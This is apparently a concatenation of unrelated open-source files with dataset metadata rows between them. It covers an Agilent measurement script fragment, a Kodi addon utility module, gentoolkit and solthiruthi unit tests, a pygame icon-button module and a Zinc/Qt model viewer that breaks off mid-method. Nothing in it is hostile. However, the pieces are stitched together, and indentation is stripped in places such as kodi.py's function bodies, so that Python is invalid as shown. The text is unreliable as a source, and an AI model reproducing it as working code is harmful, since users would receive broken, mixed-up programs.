ag = buscaAgilent()
##############################
    # read a single channel      #
##############################
#lerCanal103(ag)
#lerTensao(ag)
#lerCorrente(ag)
##########################
    # read two channels      #
##########################
raw, V, I = lerTensaoCorrente(ag)
V, I = aplicaCorrecoes(V, I)
pltTensaoCorrente(V, I)
    ############################
    # sequential acquisitions  #
    ############################
    # 60 acquisitions
    # saved under "C:\Temp"
#sequenciaAquisicoes(ag, 10)
| apache-2.0 | -3,173,579,012,957,982,000 | 25.769231 | 110 | 0.557373 | false |
argivaitv/argivaitv | plugin.video.salts/salts_lib/kodi.py | 1 | 4210 | """
SALTS XBMC Addon
Copyright (C) 2015 tknorris
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
import xbmcaddon
import xbmcplugin
import xbmcgui
import xbmc
import xbmcvfs
import urllib
import urlparse
import sys
import os
import re
addon = xbmcaddon.Addon()
ICON_PATH = os.path.join(addon.getAddonInfo('path'), 'icon.png')
get_setting = addon.getSetting
show_settings = addon.openSettings
def get_path():
return addon.getAddonInfo('path')
def get_profile():
return addon.getAddonInfo('profile')
def set_setting(id, value):
if not isinstance(value, basestring): value = str(value)
addon.setSetting(id, value)
def get_version():
return addon.getAddonInfo('version')
def get_id():
return addon.getAddonInfo('id')
def get_name():
return addon.getAddonInfo('name')
def get_plugin_url(queries):
try:
query = urllib.urlencode(queries)
except UnicodeEncodeError:
for k in queries:
if isinstance(queries[k], unicode):
queries[k] = queries[k].encode('utf-8')
query = urllib.urlencode(queries)
return sys.argv[0] + '?' + query
def end_of_directory(cache_to_disc=True):
xbmcplugin.endOfDirectory(int(sys.argv[1]), cacheToDisc=cache_to_disc)
def create_item(queries, label, thumb='', fanart='', is_folder=None, is_playable=None, total_items=0, menu_items=None, replace_menu=False):
list_item = xbmcgui.ListItem(label, iconImage=thumb, thumbnailImage=thumb)
add_item(queries, list_item, fanart, is_folder, is_playable, total_items, menu_items, replace_menu)
def add_item(queries, list_item, fanart='', is_folder=None, is_playable=None, total_items=0, menu_items=None, replace_menu=False):
if menu_items is None: menu_items = []
if is_folder is None:
is_folder = False if is_playable else True
if is_playable is None:
playable = 'false' if is_folder else 'true'
else:
playable = 'true' if is_playable else 'false'
liz_url = get_plugin_url(queries)
if fanart: list_item.setProperty('fanart_image', fanart)
list_item.setInfo('video', {'title': list_item.getLabel()})
list_item.setProperty('isPlayable', playable)
list_item.addContextMenuItems(menu_items, replaceItems=replace_menu)
xbmcplugin.addDirectoryItem(int(sys.argv[1]), liz_url, list_item, isFolder=is_folder, totalItems=total_items)
def parse_query(query):
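    # e.g. parse_query('?mode=search&query=foo') -> {'mode': 'search', 'query': 'foo'}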
q = {'mode': 'main'}
if query.startswith('?'): query = query[1:]
queries = urlparse.parse_qs(query)
for key in queries:
if len(queries[key]) == 1:
q[key] = queries[key][0]
else:
q[key] = queries[key]
return q
def notify(header=None, msg='', duration=2000, sound=None):
if header is None: header = get_name()
if sound is None: sound = get_setting('mute_notifications') == 'false'
xbmcgui.Dialog().notification(header, msg, ICON_PATH, duration, sound)
def get_current_view():
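    # Work out the active view id by reading the current skin's addon.xml to
    # find its resolution folder, then testing each view id declared in that
    # folder's MyVideoNav.xml against the window's available controls.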
skinPath = xbmc.translatePath('special://skin/')
xml = os.path.join(skinPath, 'addon.xml')
f = xbmcvfs.File(xml)
read = f.read()
f.close()
try: src = re.search('defaultresolution="([^"]+)', read, re.DOTALL).group(1)
except: src = re.search('<res.+?folder="([^"]+)', read, re.DOTALL).group(1)
src = os.path.join(skinPath, src, 'MyVideoNav.xml')
f = xbmcvfs.File(src)
read = f.read()
f.close()
match = re.search('<views>([^<]+)', read, re.DOTALL)
if match:
views = match.group(1)
for view in views.split(','):
if xbmc.getInfoLabel('Control.GetLabel(%s)' % (view)): return view
| gpl-2.0 | -4,517,156,319,772,024,300 | 33.793388 | 139 | 0.670784 | false |
dol-sen/gentoolkit | pym/gentoolkit/test/test_cpv.py | 1 | 4129 | #!/usr/bin/python
#
# Copyright(c) 2009, Gentoo Foundation
#
# Licensed under the GNU General Public License, v2
#
# $Header$
import unittest
from gentoolkit.cpv import *
from gentoolkit.test import cmp
class TestGentoolkitCPV(unittest.TestCase):
def assertEqual2(self, o1, o2):
# logic bugs hidden behind short circuiting comparisons for metadata
# is why we test the comparison *both* ways.
self.assertEqual(o1, o2)
c = cmp(o1, o2)
self.assertEqual(c, 0,
msg="checking cmp for %r, %r, aren't equal: got %i" % (o1, o2, c))
self.assertEqual(o2, o1)
c = cmp(o2, o1)
self.assertEqual(c, 0,
msg="checking cmp for %r, %r,aren't equal: got %i" % (o2, o1, c))
def assertNotEqual2(self, o1, o2):
		# logic bugs hidden behind short circuiting comparisons for metadata
		# is why we test the comparison *both* ways.
self.assertNotEqual(o1, o2)
c = cmp(o1, o2)
self.assertNotEqual(c, 0,
msg="checking cmp for %r, %r, not supposed to be equal, got %i"
% (o1, o2, c))
self.assertNotEqual(o2, o1)
c = cmp(o2, o1)
self.assertNotEqual(c, 0,
msg="checking cmp for %r, %r, not supposed to be equal, got %i"
% (o2, o1, c))
def test_comparison(self):
self.assertEqual2(CPV('pkg'), CPV('pkg'))
self.assertNotEqual2(CPV('pkg'), CPV('pkg1'))
self.assertEqual2(CPV('cat/pkg'), CPV('cat/pkg'))
self.assertNotEqual2(CPV('cat/pkg'), CPV('cat/pkgb'))
self.assertNotEqual2(CPV('cata/pkg'), CPV('cat/pkg'))
self.assertEqual2(CPV('cat/pkg-0.1'), CPV('cat/pkg-0.1'))
self.assertNotEqual2(CPV('cat/pkg-1.0'), CPV('cat/pkg-1'))
self.assertEqual2(CPV('cat/pkg-0'), CPV('cat/pkg-0'))
self.assertEqual2(CPV('cat/pkg-1-r1'), CPV('cat/pkg-1-r1'))
self.assertNotEqual2(CPV('cat/pkg-2-r1'), CPV('cat/pkg-2-r10'))
self.assertEqual2(CPV('cat/pkg-1_rc2'), CPV('cat/pkg-1_rc2'))
self.assertNotEqual2(CPV('cat/pkg-2_rc2-r1'), CPV('cat/pkg-2_rc1-r1'))
def test_compare_strs(self):
# Test ordering of package strings, Portage has test for vercmp,
# so just do the rest
version_tests = [
# different categories
('sys-apps/portage-2.1.6.8', 'sys-auth/pambase-20080318'),
# different package names
('sys-apps/pkgcore-0.4.7.15-r1', 'sys-apps/portage-2.1.6.8'),
# different package versions
('sys-apps/portage-2.1.6.8', 'sys-apps/portage-2.2_rc25')
]
# Check less than
for vt in version_tests:
self.failUnless(compare_strs(vt[0], vt[1]) == -1)
# Check greater than
for vt in version_tests:
self.failUnless(compare_strs(vt[1], vt[0]) == 1)
# Check equal
vt = ('sys-auth/pambase-20080318', 'sys-auth/pambase-20080318')
self.failUnless(compare_strs(vt[0], vt[1]) == 0)
def test_chunk_splitting(self):
all_tests = [
# simple
('sys-apps/portage-2.2', {
'category': 'sys-apps',
'name': 'portage',
'cp': 'sys-apps/portage',
'version': '2.2',
'revision': '',
'fullversion': '2.2'
}),
# with rc
('sys-apps/portage-2.2_rc10', {
'category': 'sys-apps',
'name': 'portage',
'cp': 'sys-apps/portage',
'version': '2.2_rc10',
'revision': '',
'fullversion': '2.2_rc10'
}),
# with revision
('sys-apps/portage-2.2_rc10-r1', {
'category': 'sys-apps',
'name': 'portage',
'cp': 'sys-apps/portage',
'version': '2.2_rc10',
'revision': 'r1',
'fullversion': '2.2_rc10-r1'
}),
# with dash (-) in name (Bug #316961)
('c-portage', {
'category': '',
'name': 'c-portage',
'cp': 'c-portage',
'version': '',
'revision': '',
'fullversion': ''
}),
# with dash (-) in name (Bug #316961)
('sys-apps/c-portage-2.2_rc10-r1', {
'category': 'sys-apps',
'name': 'c-portage',
'cp': 'sys-apps/c-portage',
'version': '2.2_rc10',
'revision': 'r1',
'fullversion': '2.2_rc10-r1'
}),
]
for test in all_tests:
cpv = CPV(test[0])
keys = ('category', 'name', 'cp', 'version', 'revision', 'fullversion')
for k in keys:
self.failUnlessEqual(
getattr(cpv, k), test[1][k]
)
def test_main():
suite = unittest.TestLoader().loadTestsFromTestCase(TestGentoolkitCPV)
unittest.TextTestRunner(verbosity=2).run(suite)
test_main.__test__ = False
if __name__ == '__main__':
test_main()
| gpl-2.0 | 9,081,922,295,895,087,000 | 28.283688 | 74 | 0.614434 | false |
Ezhil-Language-Foundation/open-tamil | tests/solthiruthi_data_parser.py | 1 | 1780 | # -*- coding: utf-8 -*-
# (C) 2015 Muthiah Annamalai
# setup the paths
from opentamiltests import *
from solthiruthi.data_parser import *
from solthiruthi.solthiruthi import Solthiruthi
import sys
class CmdLineIO(unittest.TestCase):
def test_CLI_interface_help(self):
return
# find a way to run this test which exits the suite
_, parser = Solthiruthi.get_CLI_options(do_parse=False)
args = parser.parse_args(["--help"])
self.assertEqual(args.help, True)
def test_CLI_defaults(self):
_, parser = Solthiruthi.get_CLI_options(do_parse=False)
args = parser.parse_args(["-stdin"])
self.assertEqual(args.files, "")
self.assertEqual(args.help, False)
self.assertEqual(args.nalt, 10)
self.assertEqual(args.Dictionary, ["std"])
self.assertEqual(args.dialects, ["std"])
def test_CLI_files(self):
ips = ["-files", "poonga", "vanam", "sethu", "ezhuthu"]
_, parser = Solthiruthi.get_CLI_options(do_parse=False)
args = parser.parse_args(ips)
self.assertEqual(args.files, ips[1:])
def test_CLI_dicts(self):
ips = ["-Dict", "std", "wikipedia", "madurai"]
_, parser = Solthiruthi.get_CLI_options(do_parse=False)
args = parser.parse_args(ips)
self.assertEqual(args.Dictionary, ips[1:])
class DataParserTest(unittest.TestCase):
def test_worlists(self):
obj = DataParser.run(["data/maligaiporul.txt", "data/vilangugal.txt"])
r = obj.analysis()
self.assertEqual(r["catlen"], 5)
# self.assertEqual(r['total'],141)
self.assertEqual(
sorted(list(map(len, r["dict"].values()))), sorted([56, 28, 15, 8, 3])
)
if __name__ == "__main__":
unittest.main()
| mit | -1,105,546,994,034,957,800 | 32.584906 | 82 | 0.617416 | false |
jwayneroth/mpd-touch | pygameui/button.py | 1 | 11634 | import label
import callback
import theme
import pygame
import view
import imageview
CENTER = 0
LEFT = 1
RIGHT = 2
TOP = 3
BOTTOM = 4
WORD_WRAP = 0
CLIP = 1
"""
Button
A button with a text caption.
Essentially an interactive label.
Signals
on_clicked(button, mousebutton)
"""
class Button(label.Label):
def __init__(self, frame, caption, halign=CENTER, valign=CENTER, wrap=CLIP):
if frame.h == 0:
frame.h = theme.current.button_height
label.Label.__init__(self, frame, caption,halign, valign,wrap)
self._enabled = True
self.on_clicked = callback.Signal()
def layout(self):
label.Label.layout(self)
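		# auto-size the width to fit the caption plus horizontal padding
		# when no explicit width was given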
if self.frame.w == 0:
self.frame.w = self.text_size[0] + self.padding[0] * 2
label.Label.layout(self)
def mouse_up(self, button, point):
self.on_clicked(self, button)
"""
ImageButton
A button that uses an image instead of a text caption.
"""
class ImageButton(view.View):
def __init__(self, frame, image):
if frame is None:
frame = pygame.Rect((0, 0), image.get_size())
elif frame.w == 0 or frame.h == 0:
frame.size = image.get_size()
view.View.__init__(self, frame)
self.on_clicked = callback.Signal()
self.image_view = imageview.ImageView(pygame.Rect(0, 0, 0, 0), image)
self.image_view._enabled = False
self.add_child(self.image_view)
def layout(self):
self.frame.w = self.padding[0] * 2 + self.image_view.frame.w
self.frame.h = self.padding[1] * 2 + self.image_view.frame.h
self.image_view.frame.topleft = self.padding
self.image_view.layout()
view.View.layout(self)
def mouse_up(self, button, point):
self.on_clicked(self, button)
"""
IconButton
"""
class IconButton(Button):
def __init__(self, frame, icon_class='cd', caption=''):
self.classes = {
'asterisk' : u'\u002a',
'plus' : u'\u002b',
'euro' : u'\u20ac',
'eur' : u'\u20ac',
'minus' : u'\u2212',
'cloud' : u'\u2601',
'envelope' : u'\u2709',
'pencil' : u'\u270f',
'glass' : u'\ue001',
'music' : u'\ue002',
'search' : u'\ue003',
'heart' : u'\ue005',
'star' : u'\ue006',
'star-empty' : u'\ue007',
'user' : u'\ue008',
'film' : u'\ue009',
'th-large' : u'\ue010',
'th' : u'\ue011',
'th-list' : u'\ue012',
'ok' : u'\ue013',
'remove' : u'\ue014',
'zoom-in' : u'\ue015',
'zoom-out' : u'\ue016',
'off' : u'\ue017',
'signal' : u'\ue018',
'cog' : u'\ue019',
'trash' : u'\ue020',
'home' : u'\ue021',
'file' : u'\ue022',
'time' : u'\ue023',
'road' : u'\ue024',
'download-alt' : u'\ue025',
'download' : u'\ue026',
'upload' : u'\ue027',
'inbox' : u'\ue028',
'play-circle' : u'\ue029',
'repeat' : u'\ue030',
'refresh' : u'\ue031',
'list-alt' : u'\ue032',
'lock' : u'\ue033',
'flag' : u'\ue034',
'headphones' : u'\ue035',
'volume-off' : u'\ue036',
'volume-down' : u'\ue037',
'volume-up' : u'\ue038',
'qrcode' : u'\ue039',
'barcode' : u'\ue040',
'tag' : u'\ue041',
'tags' : u'\ue042',
'book' : u'\ue043',
'bookmark' : u'\ue044',
'print' : u'\ue045',
'camera' : u'\ue046',
'font' : u'\ue047',
'bold' : u'\ue048',
'italic' : u'\ue049',
'text-height' : u'\ue050',
'text-width' : u'\ue051',
'align-left' : u'\ue052',
'align-center' : u'\ue053',
'align-right' : u'\ue054',
'align-justify' : u'\ue055',
'list' : u'\ue056',
'indent-left' : u'\ue057',
'indent-right' : u'\ue058',
'facetime-video' : u'\ue059',
'picture' : u'\ue060',
'map-marker' : u'\ue062',
'adjust' : u'\ue063',
'tint' : u'\ue064',
'edit' : u'\ue065',
'share' : u'\ue066',
'check' : u'\ue067',
'move' : u'\ue068',
'step-backward' : u'\ue069',
'fast-backward' : u'\ue070',
'backward' : u'\ue071',
'play' : u'\ue072',
'pause' : u'\ue073',
'stop' : u'\ue074',
'forward' : u'\ue075',
'fast-forward' : u'\ue076',
'step-forward' : u'\ue077',
'eject' : u'\ue078',
'chevron-left' : u'\ue079',
'chevron-right' : u'\ue080',
'plus-sign' : u'\ue081',
'minus-sign' : u'\ue082',
'remove-sign' : u'\ue083',
'ok-sign' : u'\ue084',
'question-sign' : u'\ue085',
'info-sign' : u'\ue086',
'screenshot' : u'\ue087',
'remove-circle' : u'\ue088',
'ok-circle' : u'\ue089',
'ban-circle' : u'\ue090',
'arrow-left' : u'\ue091',
'arrow-right' : u'\ue092',
'arrow-up' : u'\ue093',
'arrow-down' : u'\ue094',
'share-alt' : u'\ue095',
'resize-full' : u'\ue096',
'resize-small' : u'\ue097',
'exclamation-sign' : u'\ue101',
'gift' : u'\ue102',
'leaf' : u'\ue103',
'fire' : u'\ue104',
'eye-open' : u'\ue105',
'eye-close' : u'\ue106',
'warning-sign' : u'\ue107',
'plane' : u'\ue108',
'calendar' : u'\ue109',
'random' : u'\ue110',
'comment' : u'\ue111',
'magnet' : u'\ue112',
'chevron-up' : u'\ue113',
'chevron-down' : u'\ue114',
'retweet' : u'\ue115',
'shopping-cart' : u'\ue116',
'folder-close' : u'\ue117',
'folder-open' : u'\ue118',
'resize-vertical' : u'\ue119',
'resize-horizontal' : u'\ue120',
'hdd' : u'\ue121',
'bullhorn' : u'\ue122',
'bell' : u'\ue123',
'certificate' : u'\ue124',
'thumbs-up' : u'\ue125',
'thumbs-down' : u'\ue126',
'hand-right' : u'\ue127',
'hand-left' : u'\ue128',
'hand-up' : u'\ue129',
'hand-down' : u'\ue130',
'circle-arrow-right' : u'\ue131',
'circle-arrow-left' : u'\ue132',
'circle-arrow-up' : u'\ue133',
'circle-arrow-down' : u'\ue134',
'globe' : u'\ue135',
'wrench' : u'\ue136',
'tasks' : u'\ue137',
'filter' : u'\ue138',
'briefcase' : u'\ue139',
'fullscreen' : u'\ue140',
'dashboard' : u'\ue141',
'paperclip' : u'\ue142',
'heart-empty' : u'\ue143',
'link' : u'\ue144',
'phone' : u'\ue145',
'pushpin' : u'\ue146',
'usd' : u'\ue148',
'gbp' : u'\ue149',
'sort' : u'\ue150',
'sort-by-alphabet' : u'\ue151',
'sort-by-alphabet-alt' : u'\ue152',
'sort-by-order' : u'\ue153',
'sort-by-order-alt' : u'\ue154',
'sort-by-attributes' : u'\ue155',
'sort-by-attributes-alt' : u'\ue156',
'unchecked' : u'\ue157',
'expand' : u'\ue158',
'collapse-down' : u'\ue159',
'collapse-up' : u'\ue160',
'log-in' : u'\ue161',
'flash' : u'\ue162',
'log-out' : u'\ue163',
'new-window' : u'\ue164',
'record' : u'\ue165',
'save' : u'\ue166',
'open' : u'\ue167',
'saved' : u'\ue168',
'import' : u'\ue169',
'export' : u'\ue170',
'send' : u'\ue171',
'floppy-disk' : u'\ue172',
'floppy-saved' : u'\ue173',
'floppy-remove' : u'\ue174',
'floppy-save' : u'\ue175',
'floppy-open' : u'\ue176',
'credit-card' : u'\ue177',
'transfer' : u'\ue178',
'cutlery' : u'\ue179',
'header' : u'\ue180',
'compressed' : u'\ue181',
'earphone' : u'\ue182',
'phone-alt' : u'\ue183',
'tower' : u'\ue184',
'stats' : u'\ue185',
'sd-video' : u'\ue186',
'hd-video' : u'\ue187',
'subtitles' : u'\ue188',
'sound-stereo' : u'\ue189',
'sound-dolby' : u'\ue190',
'sound-5-1' : u'\ue191',
'sound-6-1' : u'\ue192',
'sound-7-1' : u'\ue193',
'copyright-mark' : u'\ue194',
'registration-mark' : u'\ue195',
'cloud-download' : u'\ue197',
'cloud-upload' : u'\ue198',
'tree-conifer' : u'\ue199',
'tree-deciduous' : u'\ue200',
'cd' : u'\ue201',
'save-file' : u'\ue202',
'open-file' : u'\ue203',
'level-up' : u'\ue204',
'copy' : u'\ue205',
'paste' : u'\ue206',
'alert' : u'\ue209',
'equalizer' : u'\ue210',
'king' : u'\ue211',
'queen' : u'\ue212',
'pawn' : u'\ue213',
'bishop' : u'\ue214',
'knight' : u'\ue215',
'baby-formula' : u'\ue216',
'tent' : u'\u26fa',
'blackboard' : u'\ue218',
'bed' : u'\ue219',
'apple' : u'\uf8ff',
'erase' : u'\ue221',
'hourglass' : u'\u231b',
'lamp' : u'\ue223',
'duplicate' : u'\ue224',
'piggy-bank' : u'\ue225',
'scissors' : u'\ue226',
'bitcoin' : u'\ue227',
'btc' : u'\ue227',
'xbt' : u'\ue227',
'yen' : u'\u00a5',
'jpy' : u'\u00a5',
'ruble' : u'\u20bd',
'rub' : u'\u20bd',
'scale' : u'\ue230',
'ice-lolly' : u'\ue231',
'ice-lolly-tasted' : u'\ue232',
'education' : u'\ue233',
'option-horizontal' : u'\ue234',
'option-vertical' : u'\ue235',
'menu-hamburger' : u'\ue236',
'modal-window' : u'\ue237',
'oil' : u'\ue238',
'grain' : u'\ue239',
'sunglasses' : u'\ue240',
'text-size' : u'\ue241',
'text-color' : u'\ue242',
'text-background' : u'\ue243',
'object-align-top' : u'\ue244',
'object-align-bottom' : u'\ue245',
'object-align-horizontal': u'\ue246',
'object-align-left' : u'\ue247',
'object-align-vertical' : u'\ue248',
'object-align-right' : u'\ue249',
'triangle-right' : u'\ue250',
'triangle-left' : u'\ue251',
'triangle-bottom' : u'\ue252',
'triangle-top' : u'\ue253',
'console' : u'\ue254',
'superscript' : u'\ue255',
'subscript' : u'\ue256',
'menu-left' : u'\ue257',
'menu-right' : u'\ue258',
'menu-down' : u'\ue259',
'menu-up' : u'\ue260'
}
self._icon_class = icon_class
caption = self.get_caption( icon_class )
Button.__init__(self, frame, caption)
def __repr__(self):
if hasattr(self, 'tag_name'):
return self.tag_name + ' icon'
if self._icon_class is None:
return ''
return self._icon_class + ' icon'
@property
def icon_class(self):
return self._icon_class
@icon_class.setter
def icon_class(self, icon_class):
self._icon_class = icon_class
caption = self.get_caption( icon_class )
self.text = caption
self.render()
def get_caption(self, class_name):
if class_name in self.classes:
return self.classes[class_name]
return self.classes['cd']
def _render(self, text):
self.text_surfaces, self.text_shadow_surfaces = [], []
#wants_shadows = (self.text_shadow_color is not None and
# self.text_shadow_offset is not None)
self.text_size = self._render_line(self._text, None)
def _render_line(self, line_text, wants_shadows):
#line_text = u'\u002a'
try:
text_surface = self.font.render(line_text, True, self.text_color)
self.text_surfaces.append(text_surface)
if wants_shadows:
text_shadow_surface = self.font.render(line_text, True, self.text_shadow_color)
self.text_shadow_surfaces.append(text_shadow_surface)
return text_surface.get_size()
except:
return (0,0)
"""
NavIconButton
"""
class NavIconButton(IconButton):
def __init__(self, frame, icon_class='cd', caption=''):
IconButton.__init__(self, frame, icon_class, caption)
"""
DialogButton
"""
class DialogButton(IconButton):
def __init__(self, frame, icon_class='cd', caption=''):
IconButton.__init__(self, frame, icon_class, caption)
| mit | -5,597,498,205,768,523,000 | 27.101449 | 83 | 0.514097 | false |
ABI-Software/ZincView | src/zincview.py | 1 | 30614 | #!/usr/bin/python
"""
ZincView example visualisation application using OpenCMISS-Zinc, python, Qt (PySide)
This Source Code Form is subject to the terms of the Mozilla Public
License, v. 2.0. If a copy of the MPL was not distributed with this
file, You can obtain one at http://mozilla.org/MPL/2.0/.
"""
import os
import sys
import json
from PySide import QtGui, QtCore
from zincview_ui import Ui_ZincView
from opencmiss.zinc.context import Context as ZincContext
from opencmiss.zinc.scenecoordinatesystem import *
from opencmiss.zinc.result import RESULT_OK
from opencmiss.zinc.field import Field
def ZincRegion_getMeshSize(region, dimension):
'''
Get the number of elements of given dimension in the region and all its child regions.
:return meshSize
'''
fieldmodule = region.getFieldmodule()
mesh = fieldmodule.findMeshByDimension(dimension)
meshSize = mesh.getSize()
# recurse children
child = region.getFirstChild()
while child.isValid():
meshSize = meshSize + ZincRegion_getMeshSize(child, dimension)
child = child.getNextSibling()
return meshSize
def ZincRegion_getTimeRange(region):
'''
Recursively get the time range of finite element field parameters in region, or any child regions
:return minimum, maximum or None, None if no range
'''
minimum = None
maximum = None
# it's not easy to get the range of time; assume all nodes have same
# time range, and use timesequence from first node field with one.
# One problem is that often the last time represents the start of an
# increment, so the new range should be higher, which matters if animating
fieldmodule = region.getFieldmodule()
for fieldDomainType in [Field.DOMAIN_TYPE_NODES, Field.DOMAIN_TYPE_DATAPOINTS]:
nodeset = fieldmodule.findNodesetByFieldDomainType(fieldDomainType)
nodeiter = nodeset.createNodeiterator()
node = nodeiter.next()
if node.isValid:
fielditer = fieldmodule.createFielditerator()
field = fielditer.next()
while field.isValid():
feField = field.castFiniteElement()
if feField.isValid():
nodetemplate = nodeset.createNodetemplate()
nodetemplate.defineFieldFromNode(feField, node)
timesequence = nodetemplate.getTimesequence(feField)
if timesequence.isValid():
count = timesequence.getNumberOfTimes()
if count > 0:
thisMinimum = timesequence.getTime(1)
thisMaximum = timesequence.getTime(count)
if minimum is None:
minimum = thisMinimum
maximum = thisMaximum
elif thisMinimum < minimum:
minimum = thisMinimum
elif thisMaximum > maximum:
maximum = thisMaximum
field = fielditer.next()
# recurse children
child = region.getFirstChild()
while child.isValid():
thisMinimum, thisMaximum = ZincRegion_getTimeRange(child)
if thisMinimum is not None:
if minimum is None:
minimum = thisMinimum
maximum = thisMaximum
elif thisMinimum < minimum:
minimum = thisMinimum
elif thisMaximum > maximum:
maximum = thisMaximum
child = child.getNextSibling()
return minimum, maximum
class ZincView(QtGui.QMainWindow):
'''
Create a subclass of QMainWindow to get menu bar functionality.
'''
def __init__(self, parent=None):
'''
        Initialise the ZincView, first calling the QMainWindow __init__ function.
'''
QtGui.QMainWindow.__init__(self, parent)
self._context = ZincContext("ZincView")
self._rootRegion = self._context.createRegion()
# set up standard materials and glyphs so we can use them elsewhere
materialmodule = self._context.getMaterialmodule()
materialmodule.defineStandardMaterials()
glyphmodule = self._context.getGlyphmodule()
glyphmodule.defineStandardGlyphs()
# Using composition to include the visual element of the GUI.
self.ui = Ui_ZincView()
self.ui.setupUi(self)
self.ui.toolBox.setCurrentIndex(0)
self.ui.sceneviewerwidget.setContext(self._context)
self.ui.sceneviewerwidget.graphicsInitialized.connect(self._graphicsInitialized)
self.setWindowIcon(QtGui.QIcon(":/cmiss_icon.ico"))
def _graphicsInitialized(self):
'''
Callback for when SceneviewerWidget is initialised
Set up additional sceneviewer notifiers for updating widgets
'''
sceneviewer = self.ui.sceneviewerwidget.getSceneviewer()
sceneviewer.setScene(self._rootRegion.getScene())
self.ui.sceneviewerwidget.setSelectModeAll()
self.ui.sceneviewer_editor_widget.setSceneviewer(sceneviewer)
self.allSettingsUpdate()
def modelClear(self):
'''
Clear all subregions, meshes, nodesets, fields and graphics
'''
msgBox = QtGui.QMessageBox()
msgBox.setWindowTitle("ZincView")
msgBox.setText("Clear will destroy the model and all graphics.")
msgBox.setInformativeText("Proceed?")
msgBox.setStandardButtons(QtGui.QMessageBox.Ok | QtGui.QMessageBox.Cancel)
msgBox.setDefaultButton(QtGui.QMessageBox.Cancel)
result = msgBox.exec_()
if result == QtGui.QMessageBox.Cancel:
return
self._rootRegion = self._context.createRegion()
self.ui.region_chooser.setRootRegion(self._rootRegion)
scene = self._rootRegion.getScene()
self.ui.scene_editor.setScene(scene)
self.ui.sceneviewerwidget.getSceneviewer().setScene(scene)
self.allSettingsUpdate()
def modelLoad(self):
'''
Read model file or run script to read or define model.
'''
fileNameTuple = QtGui.QFileDialog.getOpenFileName(self, "Load ZincView Model", "", "ZincView scripts (*.zincview.py);;Model Files (*.ex* *.fieldml)")
inputScriptFileName = fileNameTuple[0]
fileFilter = fileNameTuple[1]
if not inputScriptFileName:
return
#print("reading file " + inputScriptFileName + ", filter " + fileFilter)
# set current directory to path from file, to support scripts and fieldml with external resources
path = os.path.dirname(inputScriptFileName)
os.chdir(path)
if "scripts" in fileFilter:
try:
# f = open(inputScriptFileName, 'r')
# myfunctions = {}
# exec f in myfunctions
# success = myfunctions['loadModel'](self._rootRegion)
sys.path.append(path)
_, filename = os.path.split(inputScriptFileName)
mod_name, _ = os.path.splitext(filename)
import importlib.util
spec = importlib.util.spec_from_file_location(mod_name, inputScriptFileName)
foo = importlib.util.module_from_spec(spec)
spec.loader.exec_module(foo)
success = foo.loadModel(self._rootRegion)
except:
success = False
else:
result = self._rootRegion.readFile(inputScriptFileName)
success = (result == RESULT_OK)
if not success:
msgBox = QtGui.QMessageBox()
msgBox.setWindowTitle("ZincView")
msgBox.setText("Error reading file: " + inputScriptFileName)
msgBox.setStandardButtons(QtGui.QMessageBox.Ok)
msgBox.setDefaultButton(QtGui.QMessageBox.Cancel)
result = msgBox.exec_()
return
scene = self._rootRegion.getScene()
# ensure scene editor graphics list is redisplayed, and widgets are updated
self.ui.scene_editor.setScene(scene)
self.ui.region_chooser.setRootRegion(self._rootRegion)
self.allSettingsUpdate()
self.viewAll()
def toolBoxPageChanged(self, page):
# enable view widget updates only when looking at them
self.ui.sceneviewer_editor_widget.setEnableUpdates(page == 2)
def _displayReal(self, widget, value):
'''
Display real value in a widget
'''
newText = '{:.5g}'.format(value)
widget.setText(newText)
def _displayScaleInteger(self, widget, values, numberFormat = '{:d}'):
'''
Display vector of integer values in a widget, separated by '*'
'''
newText = "*".join(numberFormat.format(value) for value in values)
widget.setText(newText)
def _parseScaleInteger(self, widget):
'''
        Return integer vector from '*'-separated text in line edit widget
'''
text = widget.text()
values = [int(value) for value in text.split('*')]
if len(values) < 1:
raise
return values
def allSettingsUpdate(self):
'''
Show initial values on widgets
'''
self.tessellationMinimumDivisionsDisplay()
self.tessellationRefinementFactorsDisplay()
self.tessellationCircleDivisionsDisplay()
self.spectrumMinimumDisplay()
self.spectrumMaximumDisplay()
self.timeMinimumDisplay()
self.timeMaximumDisplay()
self.timeTextDisplay()
self.timeSliderDisplay()
def regionChanged(self, int):
region = self.ui.region_chooser.getRegion()
self.ui.scene_editor.setScene(region.getScene())
def viewAll(self):
'''
Change sceneviewer to see all of scene.
'''
self.ui.sceneviewer_editor_widget.viewAll()
def _checkTessellationDivisions(self, minimumDivisions, refinementFactors, widget):
'''
        Check that the total tessellation divisions are not too high, or get user confirmation.
        Call with both of the vectors set; each must have at least one component.
        Returns True if the new divisions can be applied.
'''
limit = 100000 # max elements*totalsize for each dimension
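        # Work out the worst-case number of divisions per element dimension;
        # the last supplied value in each vector is reused for any missing
        # higher dimensions.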
min = 1
ref = 1
totalDivisions = [1,1,1]
totalSize3d = 1
for i in range(3):
if i < len(minimumDivisions):
min = minimumDivisions[i]
if i < len(refinementFactors):
ref = refinementFactors[i]
totalDivisions[i] = min*ref
totalSize3d = totalSize3d*min*ref
totalSize2d = totalDivisions[0]*totalDivisions[1]
if totalDivisions[1]*totalDivisions[2] > totalSize2d:
totalSize2d = totalDivisions[1]*totalDivisions[2]
if totalDivisions[2]*totalDivisions[0] > totalSize2d:
totalSize2d = totalDivisions[2]*totalDivisions[0]
totalSize1d = totalDivisions[0]
if totalDivisions[1] > totalSize1d:
totalSize1d = totalDivisions[1]
if totalDivisions[2] > totalSize1d:
totalSize1d = totalDivisions[2]
meshSize3d = ZincRegion_getMeshSize(self._rootRegion, 3)
limit3d = limit
if limit3d < meshSize3d:
limit3d = meshSize3d
overLimit3d = totalSize3d*meshSize3d > limit3d
meshSize2d = ZincRegion_getMeshSize(self._rootRegion, 2)
limit2d = limit
if limit2d < meshSize2d:
limit2d = meshSize2d
overLimit2d = totalSize2d*meshSize2d > limit2d
meshSize1d = ZincRegion_getMeshSize(self._rootRegion, 1)
limit1d = limit
if limit1d < meshSize1d:
limit1d = meshSize1d
overLimit1d = totalSize1d*meshSize1d > limit1d
if not (overLimit1d or overLimit2d or overLimit3d):
return True
widget.blockSignals(True)
msgBox = QtGui.QMessageBox()
msgBox.setWindowTitle("ZincView")
